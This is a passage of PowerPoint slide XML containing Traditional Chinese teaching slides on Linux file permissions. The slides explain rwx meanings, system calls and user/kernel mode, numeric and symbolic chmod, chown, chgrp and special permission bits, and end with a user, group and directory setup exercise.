              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>可以執行該檔案</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>三種基本的訪問權限對目錄的含義</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>r </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>可以列出目錄中的檔案、瀏覽目錄內容</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>w </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>可以在該目錄中創建、刪除、移動檔案</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>可以使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>cd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>指令進入該目錄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00922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b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>系統呼叫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system call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簡稱為 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>syscall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指運行在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user mode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的程式向 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kernel mode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請求需要更高權限運行的服務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r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dual Mode: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作業系統區分 使用者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user mode) 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和 核心模式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(kernel mode)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>，主要目的為保護系統安全。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill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sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>「</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>」</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>位於作業系統中，接受來自使用者的指令，與核心進行溝通</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" sz="1400" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>。 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400" b="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p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600684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檔案權限及數字表示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041605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使用數字法更改權限</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>遵循上述法則</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>, "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>rwx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>合起來就是 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>4 + 2 + 1 = 7, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>一個 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>rwxrwxrwx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>權限全開的檔案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>用數字來表示就是 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>"777"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>；而完全不開放權限的檔案 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>"---------", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>它的數字標示則為 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>"000"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>。底下我們再舉幾個例子說明：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>rwx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>------</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：等於數字標示 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>700 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>rwxr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>--r--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：等於數字標示 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>744</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>rw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rw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>-r-x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：等於數字標示 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>665</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>drwx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>--x--x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：等於數字標示 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>711</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>drwx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>------</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：等於數字標示 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>700 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>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711020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我們舉些範例說明會更清楚：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>rwx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>------</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>：檔案擁有者對檔案具有讀取、寫入與執行的權限。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>rwxr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>--r--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>：檔案擁有者具有讀、寫與執行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同群組及其他使用者則具有讀取的權限。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>rw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>rw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>-r--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>：檔案擁有者與同群組的使用者對檔案具有讀寫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而其他使用者僅具有讀取的權限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632347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drwx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>--x--x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>：目錄擁有者具有讀、寫與進入目錄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同群組及其他使用者僅能進入該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卻無法讀取檔案列表。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>drwx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>------</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>：除了目錄擁有者具有完整的權限之外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同群組與其他使用者對該目錄沒有任何權限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5121938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400" dirty="0" smtClean="0"/>
              <a:t>每個使用者都擁有自己的家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這些目錄通常集中放置於 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>/home </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>目錄下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這些家目錄的預設權限為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drwx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>------", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>表示目錄擁有者本身具備全部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而同群組與其他使用者對該目錄則沒有任何權限：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550983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400" dirty="0" smtClean="0"/>
              <a:t>當我們以管理者帳號 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>(root) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>執行 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>mkdir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指令建立目錄時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新建目錄的權限預設為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rwxr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>xr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>-x", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>使用一般使用者帳號執行 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>mkdir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指令時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新建目錄的權限則預設為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rwxrwxr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>-x"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>。建好目錄後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您可以視實際需求而定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自行變更目錄的權限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8163510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gr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可把檔案或目錄訪問權限轉給其他群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endParaRPr kumimoji="1" lang="en-US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gr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群組名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名稱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gr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改變檔案所屬群組</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1100" dirty="0"/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gr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users install.log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將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stall.log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群組變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ser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150646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own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可改變檔案的所有者，也可以修改檔案的所屬群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own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帳號名稱 檔案或目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own</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1100" dirty="0"/>
          </a:p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hown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bin install.log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將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nstall.log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擁有者變為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in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650634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err="1" smtClean="0"/>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>可以更改檔案或目錄的權限</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>格式：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t> xyz [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>檔案或目錄</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>參數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R:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>進連同次目錄下的所有檔案都變更</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="140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479176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另一個改變權限的方法</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>使用符號類型改變檔案權限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443692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952829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400" dirty="0" smtClean="0"/>
              <a:t>用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>chmod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指令配合文字參數就能改變權限設定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下面舉例說明：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u+rw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為檔案擁有者加入讀取和寫入的權限。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>"g-x"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>：將同群組使用者的執行權限取消。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g+x,o+rx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為同群組使用者加入執行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並為其他使用者加入讀取與執行的權限。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u+rwx,g-w,o-w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加入檔案或目錄擁有者完整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並且取消同群組與其他使用者的寫入權限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215748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"o=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>rx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設定其他使用者具有讀取和執行的權限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而沒有寫入權限。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ugo+x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>或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a+x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同時為擁有者、同群組、其他使用者加入執行權限</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>, "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>ugo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可以合稱為 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>"a"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>"+x"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>：和 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ugo+x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a+x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>的意義相同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沒有指定 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>u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g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o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>或 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>時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即代表全部。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o+t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加入 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Sticky </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>特殊權限。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>u+s,g+s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>：加入 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>SUID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>和 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>SGID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>特殊權限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898127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>
          <a:xfrm>
            <a:off x="679450" y="4676081"/>
            <a:ext cx="5438775" cy="4468812"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>useradd</a:t>
            </a:r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reg</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>useradd</a:t>
            </a:r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rex</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>useradd</a:t>
            </a:r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rek</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>groupadd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" dirty="0" smtClean="0"/>
              <a:t> house</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>groupadd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" dirty="0" smtClean="0"/>
              <a:t> hand</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>groupadd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" dirty="0" smtClean="0"/>
              <a:t> heard</a:t>
            </a:r>
          </a:p>
          <a:p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mkdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" dirty="0" smtClean="0"/>
              <a:t> lose</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>mkdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" dirty="0" smtClean="0"/>
              <a:t> look</a:t>
            </a:r>
          </a:p>
          <a:p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mkdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" dirty="0" smtClean="0"/>
              <a:t> lake</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>mkdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" dirty="0" smtClean="0"/>
              <a:t> land</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" dirty="0" smtClean="0"/>
              <a:t>touch look/many</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>chown</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>reg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" dirty="0" smtClean="0"/>
              <a:t> look/many</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" dirty="0" smtClean="0"/>
              <a:t>touch lose/man</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>chgrp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" dirty="0" smtClean="0"/>
              <a:t> house lose/man</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" dirty="0" smtClean="0"/>
              <a:t>touch lake/mail</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" dirty="0" smtClean="0"/>
              <a:t>touch lake/large</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
